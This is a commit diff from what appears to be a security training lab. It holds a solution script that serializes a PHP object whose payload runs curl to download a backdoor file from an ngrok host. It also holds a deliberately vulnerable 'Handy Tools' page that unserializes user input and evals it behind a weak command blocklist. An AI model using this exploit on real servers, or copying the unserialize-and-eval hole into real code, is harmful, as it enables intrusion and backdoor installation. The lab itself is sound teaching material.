-
Notifications
You must be signed in to change notification settings - Fork 12
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add random name for the backdoor file + format files
Signed-off-by: Carina Deaconu <[email protected]>
- Loading branch information
Showing
4 changed files
with
117 additions
and
113 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
f2ft24backdoor.php |
23 changes: 12 additions & 11 deletions
23
exotic-attacks/activities/handy-tool/sol/make_backdoor.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,16 +1,17 @@ | ||
<?php | ||
$NGROK_HOST = ""; // TODO: ngrok host (check README.md) | ||
$NGROK_PORT = 0; // TODO: ngrok port (check README.md) | ||
$NGROK_HOST = ""; // TODO: ngrok host (check README.md) | ||
$NGROK_PORT = 0; // TODO: ngrok port (check README.md) | ||
|
||
class PHPClass | ||
{ | ||
public $condition = true; | ||
public $prop = ""; | ||
class PHPClass | ||
{ | ||
public $condition = true; | ||
public $prop = ""; | ||
|
||
public function __construct($host, $port) { | ||
$this->prop = "system('curl http://".$host.":".$port." -o backdoor.php');"; | ||
} | ||
} | ||
public function __construct($host, $port) { | ||
$backdoor_name = trim(file_get_contents("backdoor_name.txt")); | ||
$this->prop = "system('curl http://".$host.":".$port." -o $backdoor_name');"; | ||
} | ||
} | ||
|
||
echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT))); | ||
echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT))); | ||
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,100 +1,100 @@ | ||
<?php | ||
class PHPClass { | ||
public $condition; | ||
public $prop; | ||
|
||
function __construct() { | ||
|
||
} | ||
|
||
function __wakeup() { | ||
$forbbiden_commands = [ | ||
"cat", | ||
"head", | ||
"grep", | ||
"tail", | ||
"tac", | ||
"rev", | ||
"awk", | ||
"sed", | ||
"more", | ||
"cut", | ||
"nl", | ||
"less", | ||
"sort", | ||
"python", | ||
"perl", | ||
"m4", // similar to `cat` | ||
]; | ||
|
||
if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) { | ||
return; | ||
} | ||
|
||
foreach ($forbbiden_commands as $cmd) { | ||
if (strpos($this->prop, $cmd) !== false) { | ||
return; | ||
} | ||
} | ||
|
||
eval($this->prop); | ||
} | ||
} | ||
?> | ||
|
||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<meta charset="utf-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1"> | ||
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css"> | ||
</head> | ||
|
||
<body> | ||
<div> | ||
<div class="container"> | ||
<div class="row"> | ||
<div class="bg-white p-5 mx-auto col-md-8 col-10"> | ||
<h3 class="display-3">Handy Tools<br></h3> | ||
<form method="GET"> | ||
<div class="form-group"> | ||
<label>Select tool</label> | ||
<select name="tool" class="form-control"> | ||
<option value="toupper">To Upper Case</option> | ||
<option value="unserialize">Unserialize</option> | ||
<option value="trim">Trim whitespaces</option> | ||
<option value="manny">Guess my last name: Manny...</option> | ||
</select> | ||
</div> | ||
<div class="form-group"> | ||
<label>Input</label> | ||
<input name="input" type="text" class="form-control"> | ||
<small class="form-text text-muted"></small> | ||
</div> | ||
<?php | ||
if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') { | ||
echo var_dump(strtoupper($_GET['input'])); | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') { | ||
echo var_dump(unserialize($_GET['input'])); | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') { | ||
echo var_dump(str_replace(' ', '', $_GET['input'])); | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') { | ||
if (strtolower($_GET['input']) == 'iscusitul') | ||
echo "backup.zip"; | ||
else | ||
echo "Wrong!"; | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} | ||
?> | ||
<input type="submit" class="btn btn-primary" name="submit" value="Submit" /> | ||
</form> | ||
</div> | ||
</div> | ||
</div> | ||
</div> | ||
</body> | ||
|
||
</html> | ||
<?php | ||
class PHPClass { | ||
public $condition; | ||
public $prop; | ||
|
||
function __construct() { | ||
|
||
} | ||
|
||
function __wakeup() { | ||
$forbbiden_commands = [ | ||
"cat", | ||
"head", | ||
"grep", | ||
"tail", | ||
"tac", | ||
"rev", | ||
"awk", | ||
"sed", | ||
"more", | ||
"cut", | ||
"nl", | ||
"less", | ||
"sort", | ||
"python", | ||
"perl", | ||
"m4", // similar to `cat` | ||
]; | ||
|
||
if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) { | ||
return; | ||
} | ||
|
||
foreach ($forbbiden_commands as $cmd) { | ||
if (strpos($this->prop, $cmd) !== false) { | ||
return; | ||
} | ||
} | ||
|
||
eval($this->prop); | ||
} | ||
} | ||
?> | ||
|
||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<meta charset="utf-8"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1"> | ||
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css"> | ||
</head> | ||
|
||
<body> | ||
<div> | ||
<div class="container"> | ||
<div class="row"> | ||
<div class="bg-white p-5 mx-auto col-md-8 col-10"> | ||
<h3 class="display-3">Handy Tools<br></h3> | ||
<form method="GET"> | ||
<div class="form-group"> | ||
<label>Select tool</label> | ||
<select name="tool" class="form-control"> | ||
<option value="toupper">To Upper Case</option> | ||
<option value="unserialize">Unserialize</option> | ||
<option value="trim">Trim whitespaces</option> | ||
<option value="manny">Guess my last name: Manny...</option> | ||
</select> | ||
</div> | ||
<div class="form-group"> | ||
<label>Input</label> | ||
<input name="input" type="text" class="form-control"> | ||
<small class="form-text text-muted"></small> | ||
</div> | ||
<?php | ||
if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') { | ||
echo var_dump(strtoupper($_GET['input'])); | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') { | ||
echo var_dump(unserialize($_GET['input'])); | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') { | ||
echo var_dump(str_replace(' ', '', $_GET['input'])); | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') { | ||
if (strtolower($_GET['input']) == 'iscusitul') | ||
echo "backup.zip"; | ||
else | ||
echo "Wrong!"; | ||
echo "<br>"; echo "<br>"; echo "<br>"; | ||
} | ||
?> | ||
<input type="submit" class="btn btn-primary" name="submit" value="Submit" /> | ||
</form> | ||
</div> | ||
</div> | ||
</div> | ||
</div> | ||
</body> | ||
|
||
</html> |